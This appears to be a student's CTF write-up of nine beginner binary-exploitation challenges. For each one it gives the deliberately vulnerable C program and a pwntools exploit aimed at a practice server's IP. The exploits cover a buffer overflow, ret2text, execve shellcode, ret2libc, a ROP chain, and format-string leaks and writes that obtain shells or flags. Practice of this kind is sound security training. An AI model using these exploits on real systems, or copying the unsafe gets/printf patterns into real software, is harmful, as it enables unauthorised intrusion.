pwn for first learn

:::info [題目來源](https://github.com/FlyDragonW/TaiwanHolyYoung_Pwn) ::: :::success [練習網站](https://tryhackme.com/r/room/pwn101) [參考解法](https://hackmd.io/@vNeOEzglRpyGwr4-inKPuw/SkLKqH5OA) ::: **0x01-pwntools** ```python from pwn import * r = remote('140.110.112.217', 10000) line = r.recvline().decode('UTF-8').strip() print(line) data = int(line.split()[-1].rstrip('!')) print(data) low, high = 0, data while True: guess = (low + high) // 2 r.sendline(str(guess).encode('UTF-8')) response = r.recvline().decode().strip() if response == 'Higher!': low = guess + 1 elif response == 'Lower!': high = guess - 1 else: print(response) break r.interactive() r.close() ``` ![image](https://hackmd.io/_uploads/S1Dg829SA.png) --- **0x02-bof_var** source code: ```c #include <stdio.h> //gcc -o bof_var bof_var.c -fno-stack-protector int main() { setvbuf(stdout, NULL, _IONBF, 0); int key = 1234; puts("Please enter your name:"); char name[16]; read(0, name, 100); if(key == 0xfaceb00c){ puts("FLAG{FAKE_FLAG}"); } return 0; } ``` exploit: ```python from pwn import * r = remote('140.110.112.217', 10001) r.sendline(b'A' * 28 + p64(0xfaceb00c)) print(r.recvline()) r.interactive() r.close() ``` ![image](https://hackmd.io/_uploads/BytoHhcrA.png) --- **0x03-ret2text** source code: ```c #include <stdio.h> //gcc -o ret2text ret2text.c -fno-stack-protector -no-pie void backdoor(){ system("/bin/sh"); } int main() { char buffer[8]; gets(buffer); return 0; } ``` exploit: ```py from pwn import * r = remote('140.110.112.217', 10002) r.sendline(b'A' * 16 + p64(0x40115b)) r.interactive() r.close() ``` ![image](https://hackmd.io/_uploads/BJ_Xsi9SR.png) --- **0x04-ret2sc** source code: ```c #include <stdio.h> #include <sys/mman.h> // gcc -o ret2sc ret2sc.c -fno-stack-protector -no-pie -z execstack char message[50]; int main() { setvbuf(stdout,0,2,0); void *mem = (void *)0x00404000; size_t size = 0x00405000 - 0x00404000; mprotect(mem, size, PROT_READ | PROT_WRITE | PROT_EXEC); puts("Say something to me?:"); read(0, message, 50); puts("Show me ret2sc!"); char buffer[100]; gets(buffer); return 0; } ``` exploit: ```python from pwn import * r = remote('140.110.112.217', 10003) shellcode = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05" r.recvline() r.sendline(shellcode) r.recvline() r.sendline(b'a'*136 + p64(0x404080)) r.interactive() r.close() ``` ![image](https://hackmd.io/_uploads/HymSL3780.png) --- **0x05-ret2libc** source code: ```c #include <stdio.h> // gcc -o ret2libc ret2libc.c -fno-stack-protector int main(){ setvbuf( stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); char address[10]; char message[16]; unsigned int addr ; puts("Can you return to library?"); printf("Address of puts: %p\n", puts); printf("Address of message: %p\n", message); printf("Say some thing :\n"); gets(message); puts("Thanks you ~"); return 0 ; } ``` exploit: ```python from pwn import * #r=process("./ret2libc") r = remote('140.110.112.217', 10004) r.recvline() puts=int(r.recvline().decode().split(' ')[3],16) mes=int(r.recvline().decode().split(' ')[3],16) r.recvline() puts_offset= 0x80e50 sys_offset=0xebc81 libc_base=puts-puts_offset system=libc_base+sys_offset rbp=mes-0x2000 #gdb.attach(r) r.sendline(b'a'*32+ p64(rbp)+p64(system)) r.interactive() r.close() ``` ![image](https://hackmd.io/_uploads/B11x1J4UC.png) --- **0x06-rop** source code: ```c #include <stdio.h> // gcc -o rop rop.c -static -no-pie -fno-stack-protector char message[16]; int main() { setvbuf( stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); char buf[8]; puts("Leave some message:"); read(0, message, 16); puts("Show me rop!"); gets(buf); return 0; } ``` exploit: ```python from pwn import * #r=process("./rop") r = remote('140.110.112.217', 10005) r.recvline() r.sendline('/bin/sh\x00') r.recvline() pop_rdi=0x401f2f pop_rsi=0x409f9e pop_rax_rdx_rbx=0x47f2ea pop_rax=0x419484 syscall=0x401ce4 r.sendline(b'a'*16+p64(pop_rdi)+p64(0x4c72f0)+p64(pop_rsi)+p64(0)+p64(pop_rax_rdx_rbx)+p64(59)+p64(0)+p64(59)+p64(syscall)) r.interactive() r.close() ``` ![image](https://hackmd.io/_uploads/rJZLylNIC.png) --- **0x07-fmt1** source code: ```c #include <stdio.h> // gcc -o fmt_1 fmt_1.c int main() { char buf[40]; char flag[16] = "FLAG{FAKE_FLAG!}"; scanf("%s", buf); printf(buf); return 0; } ``` exploit: ```bash parrot@G:/mnt/d/Users/cheng/Downloads$ nc 140.110.112.217 10006 %6$p,%7$p 0x7730687b47414c46,0x7d63755f6e34635f parrot@G:/mnt/d/Users/cheng/Downloads$ python3 Type "help", "copyright", "credits" or "license" for more information. >>> a="w0h{GALF" >>> print(a[::-1]) FLAG{h0w >>> b="}cu_n4c_" >>> print(b[::-1]) _c4n_uc} >>> ``` --- **0x08-fmt2** source code: ```c #include <stdio.h> // gcc -o fmt_2 fmt_2.c char flag[16] = "FLAG{FAKE_FLAG!}"; int main() { setvbuf( stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); printf("Address of flag: %p\n", flag); char buf[40]; scanf("%s", buf); printf(buf); return 0; } ``` exploit: ```python from pwn import * #r=process("./fmt_2") r = remote('140.110.112.217', 10007) flag=int(r.recvline().decode().split(' ')[3].strip('0x'),16) s= b'%7$s' + b'd'*4 + p64(flag) print(flag) #gdb.attach(r) r.sendline(s) r.interactive() r.close() ``` --- **0x09-fmt3** source code: ```c #include <stdio.h> // gcc -o fmt_3 fmt_3.c char key = 'a'; int main() { setvbuf( stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); printf("Address of key: %p\n", &key); char buf[40]; scanf("%s", buf); printf(buf); if(key == 'b') system("/bin/sh"); return 0; } ``` exploit: ```python from pwn import * #r=process("./fmt_3") r = remote('140.110.112.217', 10008) key=int(r.recvline().decode().split(' ')[3].strip('0x'),16) s= b'%98c%7$n' + p64(key) print(key) #gdb.attach(r) r.sendline(s) r.interactive() r.close() ``` ---